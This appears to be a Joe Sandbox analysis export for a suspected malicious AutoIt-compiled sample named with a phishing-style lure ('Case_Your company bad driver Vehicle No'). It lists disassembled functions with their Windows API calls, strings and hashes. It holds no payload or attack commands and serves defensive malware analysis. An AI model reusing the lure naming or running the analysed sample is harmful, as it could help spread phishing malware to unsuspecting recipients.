SelectObject.GDI32(?,00000000), ref: 00C3ABFA
SetBkColor.GDI32(?,00000000), ref: 00C3AC03
SelectObject.GDI32(?,?), ref: 00C3AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00C3AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C3AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00C3AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C3ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C3ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00C3ACEC
DrawFocusRect.USER32(?,?), ref: 00C3ACF7
GetSysColor.USER32(00000011), ref: 00C3AD05
SetTextColor.GDI32(?,00000000), ref: 00C3AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C3AD21
SelectObject.GDI32(?,00C3A869), ref: 00C3AD38
DeleteObject.GDI32(?), ref: 00C3AD43
SelectObject.GDI32(?,?), ref: 00C3AD49
DeleteObject.GDI32(?), ref: 00C3AD4E
SetTextColor.GDI32(?,?), ref: 00C3AD54
SetBkColor.GDI32(?,?), ref: 00C3AD5E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 34881823d4bf4a654043379ab3c680845f999ccd9a24f3d4839b68fb762ae66c
Instruction ID: 717a6286d43395bd5a68c88f9220912e9051e9fb7f812e44dd10f7ce6d9f5296
Opcode Fuzzy Hash: 34881823d4bf4a654043379ab3c680845f999ccd9a24f3d4839b68fb762ae66c
Instruction Fuzzy Hash: AF615F71D10218FFDB119FA8DC48FAEBB79EB08320F104529F915AB2A1D6719E51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C38C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C38D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C38D45
CharNextW.USER32(0000014E), ref: 00C38D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C38DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C38DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C38DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C38DF9
SetWindowTextW.USER32(?,0000014E), ref: 00C38E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C38E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C38E8C
_memset.LIBCMT ref: 00C38EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C38EFA
_memset.LIBCMT ref: 00C38F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C38F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C38FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00C39088
InvalidateRect.USER32(?,00000000,00000001), ref: 00C390AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C390F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C39121
DrawMenuBar.USER32(?), ref: 00C39130
SetWindowTextW.USER32(?,0000014E), ref: 00C39158

Strings

0, xrefs: 00C390C2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 226525918b9db7ba9c370794500b0ccdbff62519052635049e21db825bc398f2
Instruction ID: c6c0b38a7c26b7c967097bce05a5ae588b951403750b671d0dc24dea349d8b3c
Opcode Fuzzy Hash: 226525918b9db7ba9c370794500b0ccdbff62519052635049e21db825bc398f2
Instruction Fuzzy Hash: F7E19274910219AFDF20DF61CC85FEE7BB9EF05710F10815AF925AA290DB708A85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C34B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C34C51
GetDesktopWindow.USER32 ref: 00C34C66
GetWindowRect.USER32(00000000), ref: 00C34C6D
GetWindowLongW.USER32(?,000000F0), ref: 00C34CCF
DestroyWindow.USER32(?), ref: 00C34CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C34D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C34D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C34D68
SendMessageW.USER32(?,00000421,?,?), ref: 00C34D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C34D90
IsWindowVisible.USER32(?), ref: 00C34DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C34DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C34DDF
GetWindowRect.USER32(?,?), ref: 00C34DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00C34E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00C34E37
CopyRect.USER32(?,?), ref: 00C34E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00C34EB9

Strings

0, xrefs: 00C34BFC
tooltips_class32, xrefs: 00C34D1D
(, xrefs: 00C34E2A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 0b82e8dfe4d44873c4ace4f9838ad765a4c86e7e1f49e01452914bd7ab384036
Instruction ID: 915fc93bc42dbbeed726e97e25a13e6baf67bf9cded0611f566bcf75632232da
Opcode Fuzzy Hash: 0b82e8dfe4d44873c4ace4f9838ad765a4c86e7e1f49e01452914bd7ab384036
Instruction Fuzzy Hash: F9B16971618341AFDB08DF25C849B6ABBE4FF88714F00892CF5999B2A1DB71ED05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C146D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C146E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C1470E
_wcscpy.LIBCMT ref: 00C1473C
_wcscmp.LIBCMT ref: 00C14747
_wcscat.LIBCMT ref: 00C1475D
_wcsstr.LIBCMT ref: 00C14768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C14784
_wcscat.LIBCMT ref: 00C147CD
_wcscat.LIBCMT ref: 00C147D4
_wcsncpy.LIBCMT ref: 00C147FF

Strings

%u.%u.%u.%u, xrefs: 00C14862
DefaultLangCodepage, xrefs: 00C147E7
StringFileInfo\, xrefs: 00C14757
\VarFileInfo\Translation, xrefs: 00C1477C
04090000, xrefs: 00C147BA

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 88fc515e308dfbe160ce2d741b41b28ac44847f7aa4458e4802caa9b25f7c7a6
Instruction ID: c1b04f1937737ffde8345e30e7e823e585b3ee406a722661dbb4802ab2f62f7a
Opcode Fuzzy Hash: 88fc515e308dfbe160ce2d741b41b28ac44847f7aa4458e4802caa9b25f7c7a6
Instruction Fuzzy Hash: 6C411571A002017BEB14B7659C42FBFB7ECDF42710F0004ABF905E6282FB719A41A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB28BC
GetSystemMetrics.USER32(00000007), ref: 00BB28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB28EF
GetSystemMetrics.USER32(00000008), ref: 00BB28F7
GetSystemMetrics.USER32(00000004), ref: 00BB291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BB2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BB297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB2990
GetClientRect.USER32(00000000,000000FF), ref: 00BB29AE
GetStockObject.GDI32(00000011), ref: 00BB29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB29D5

Part of subcall function 00BB2344: GetCursorPos.USER32(?), ref: 00BB2357
Part of subcall function 00BB2344: ScreenToClient.USER32(00C767B0,?), ref: 00BB2374
Part of subcall function 00BB2344: GetAsyncKeyState.USER32(00000001), ref: 00BB2399
Part of subcall function 00BB2344: GetAsyncKeyState.USER32(00000002), ref: 00BB23A7

SetTimer.USER32(00000000,00000000,00000028,00BB1256), ref: 00BB29FC

Strings

AutoIt v3 GUI, xrefs: 00BB2974

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 4c309fe39db71af4b1181468e82186c4b86dd6343eec2db50d3cbbf614f201f9
Instruction ID: 042926cec46ed83accb55465c8bc5a79c008e004f4dbd5b38f4915586b591894
Opcode Fuzzy Hash: 4c309fe39db71af4b1181468e82186c4b86dd6343eec2db50d3cbbf614f201f9
Instruction Fuzzy Hash: 68B16E71A0020AEFDB14DFA8DD85BEE7BF4FB08311F108569FA19A72A0DB749841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C34069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C340F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C341B6

Strings

SELECTINVERT, xrefs: 00C34286
DESELECT, xrefs: 00C342A4
GETSUBITEMCOUNT, xrefs: 00C34141
VIEWCHANGE, xrefs: 00C34375
FINDITEM, xrefs: 00C34329
ISSELECTED, xrefs: 00C341C1
SELECTCLEAR, xrefs: 00C34235
GETTEXT, xrefs: 00C3415F
GETSELECTED, xrefs: 00C342E4
GETSELECTEDCOUNT, xrefs: 00C34199
SELECTALL, xrefs: 00C3421D
GETITEMCOUNT, xrefs: 00C34128
SELECT, xrefs: 00C34250

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 1d88c7357d7ad72a2d1b0581c1a67acd5a3199925f2cf6e5f71ce4f04cfe51d9
Instruction ID: db37b1da26aa66d731aacb1fb99b05d47fbd5bb09a0ee405bc95678ffd574a14
Opcode Fuzzy Hash: 1d88c7357d7ad72a2d1b0581c1a67acd5a3199925f2cf6e5f71ce4f04cfe51d9
Instruction Fuzzy Hash: 8BA16F702242019BCB18EF20C951BBAB7E5EF84314F1449ADB8A69B3E2DB71FD05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C252F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00C25309
LoadCursorW.USER32(00000000,00007F8A), ref: 00C25314
LoadCursorW.USER32(00000000,00007F00), ref: 00C2531F
LoadCursorW.USER32(00000000,00007F03), ref: 00C2532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00C25335
LoadCursorW.USER32(00000000,00007F01), ref: 00C25340
LoadCursorW.USER32(00000000,00007F81), ref: 00C2534B
LoadCursorW.USER32(00000000,00007F88), ref: 00C25356
LoadCursorW.USER32(00000000,00007F80), ref: 00C25361
LoadCursorW.USER32(00000000,00007F86), ref: 00C2536C
LoadCursorW.USER32(00000000,00007F83), ref: 00C25377
LoadCursorW.USER32(00000000,00007F85), ref: 00C25382
LoadCursorW.USER32(00000000,00007F82), ref: 00C2538D
LoadCursorW.USER32(00000000,00007F84), ref: 00C25398
LoadCursorW.USER32(00000000,00007F04), ref: 00C253A3
LoadCursorW.USER32(00000000,00007F02), ref: 00C253AE
GetCursorInfo.USER32(?), ref: 00C253BE
GetLastError.KERNEL32(00000001,00000000), ref: 00C253E9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 0ce3c970c6117f114be5668d9231cc93ee5b05d4e0a27152628e416e15a9c6c5
Instruction ID: b94fb5d4b3ff36b7cf7b85febe296b399a68eac19e982256bb84472cc8c460a2
Opcode Fuzzy Hash: 0ce3c970c6117f114be5668d9231cc93ee5b05d4e0a27152628e416e15a9c6c5
Instruction Fuzzy Hash: 47418470E043296ADB109FBA9C49D6FFFF8EF51B10B10452FE519E7290DAB89501CE61

Uniqueness

Uniqueness Score: -1.00%

Function 00C0AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C0AAA5
__swprintf.LIBCMT ref: 00C0AB46
_wcscmp.LIBCMT ref: 00C0AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C0ABAE
_wcscmp.LIBCMT ref: 00C0ABEA
GetClassNameW.USER32(?,?,00000400), ref: 00C0AC21
GetDlgCtrlID.USER32(?), ref: 00C0AC73
GetWindowRect.USER32(?,?), ref: 00C0ACA9
GetParent.USER32(?), ref: 00C0ACC7
ScreenToClient.USER32(00000000), ref: 00C0ACCE
GetClassNameW.USER32(?,?,00000100), ref: 00C0AD48
_wcscmp.LIBCMT ref: 00C0AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00C0AD82
_wcscmp.LIBCMT ref: 00C0AD96

Part of subcall function 00BD386C: _iswctype.LIBCMT ref: 00BD3874

Strings

%s%u, xrefs: 00C0AB40

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 2887238f08bb3514720e6a388cabc01ecdb71fc4e9efa0579ba3ba6b3e78c948
Instruction ID: 86500874503c33f00a1dd462e199ceb246e631b98a1292aa9e1a20795f9930a1
Opcode Fuzzy Hash: 2887238f08bb3514720e6a388cabc01ecdb71fc4e9efa0579ba3ba6b3e78c948
Instruction Fuzzy Hash: F1A1AE71204706AFDB14DF24C884FAAF7E8FF04355F108629F9A992191DB30EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C0B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C0B3DB
_wcscmp.LIBCMT ref: 00C0B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C0B414
CharUpperBuffW.USER32(?,00000000), ref: 00C0B431
_wcscmp.LIBCMT ref: 00C0B44F
_wcsstr.LIBCMT ref: 00C0B460
GetClassNameW.USER32(00000018,?,00000400), ref: 00C0B498
_wcscmp.LIBCMT ref: 00C0B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C0B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00C0B518
_wcscmp.LIBCMT ref: 00C0B528
GetClassNameW.USER32(00000010,?,00000400), ref: 00C0B550
GetWindowRect.USER32(00000004,?), ref: 00C0B5B9

Strings

@, xrefs: 00C0B3BC
ThumbnailClass, xrefs: 00C0B4A3, 00C0B523

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: c5eba565d5b2457d966a749929bee4a8178f0a50bb82f3282f0ba684dfb88057
Instruction ID: c08640bbf208088574fd864f976309cf22e2162a5865a2795252d3e397899a4a
Opcode Fuzzy Hash: c5eba565d5b2457d966a749929bee4a8178f0a50bb82f3282f0ba684dfb88057
Instruction Fuzzy Hash: F581B0710083059BDB15DF10C885FAABBE8EF44714F1885AEFD959A1E2EB30DE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C0B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C0B23F

Strings

[ACTIVE, xrefs: 00C0B22C
LAST, xrefs: 00C0B204
[CLASS:, xrefs: 00C0B28F
ALL, xrefs: 00C0B2D3
[LAST, xrefs: 00C0B2EC
REGEXP=, xrefs: 00C0B254
[ALL, xrefs: 00C0B2E5
CLASSNAME=, xrefs: 00C0B27C
HANDLE=, xrefs: 00C0B238
[REGEXPTITLE:, xrefs: 00C0B267
[HANDLE:, xrefs: 00C0B24B
ACTIVE, xrefs: 00C0B21A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: c96f1f7af7e6951463fbdf873afab8c529e08611d3cc3fe85ccfd8b097a37c84
Instruction ID: 2c8b222642dbdfabc92814d7e82a713a0da04db9471966c81b2a08be786e2ebe
Opcode Fuzzy Hash: c96f1f7af7e6951463fbdf873afab8c529e08611d3cc3fe85ccfd8b097a37c84
Instruction Fuzzy Hash: BF312D71A48206A6DB24FA61CD83EFEB7E8DF24B50F600579B451720E6EFB1AF04C552

Uniqueness

Uniqueness Score: -1.00%

Function 00C0C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C0C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C0C4E6
SetWindowTextW.USER32(?,?), ref: 00C0C4FD
GetDlgItem.USER32(?,000003EA), ref: 00C0C512
SetWindowTextW.USER32(00000000,?), ref: 00C0C518
GetDlgItem.USER32(?,000003E9), ref: 00C0C528
SetWindowTextW.USER32(00000000,?), ref: 00C0C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C0C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C0C569
GetWindowRect.USER32(?,?), ref: 00C0C572
SetWindowTextW.USER32(?,?), ref: 00C0C5DD
GetDesktopWindow.USER32 ref: 00C0C5E3
GetWindowRect.USER32(00000000), ref: 00C0C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C0C636
GetClientRect.USER32(?,?), ref: 00C0C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C0C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C0C693

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 72f8ef8218aa245ce1ed285640b3660d35727b21d1719fa5500fc9c455deb03b
Instruction ID: 387687698c2cf82ae36a6bff0cd30f177b7883a7c2d9c9f1d5e7ac20d89c774a
Opcode Fuzzy Hash: 72f8ef8218aa245ce1ed285640b3660d35727b21d1719fa5500fc9c455deb03b
Instruction Fuzzy Hash: A5515E70900709AFDB209FA8DD86B6EBBF5FF04705F004A2CF696A25A0C775AA45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3A4C8
DestroyWindow.USER32(?,?), ref: 00C3A542

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C3A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C3A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3A5F1
DestroyWindow.USER32(00000000), ref: 00C3A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BB0000,00000000), ref: 00C3A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3A663
GetDesktopWindow.USER32 ref: 00C3A67C
GetWindowRect.USER32(00000000), ref: 00C3A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C3A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C3A6B3

Part of subcall function 00BB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BB25EC

Strings

0, xrefs: 00C3A4DE
tooltips_class32, xrefs: 00C3A5B5, 00C3A643

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
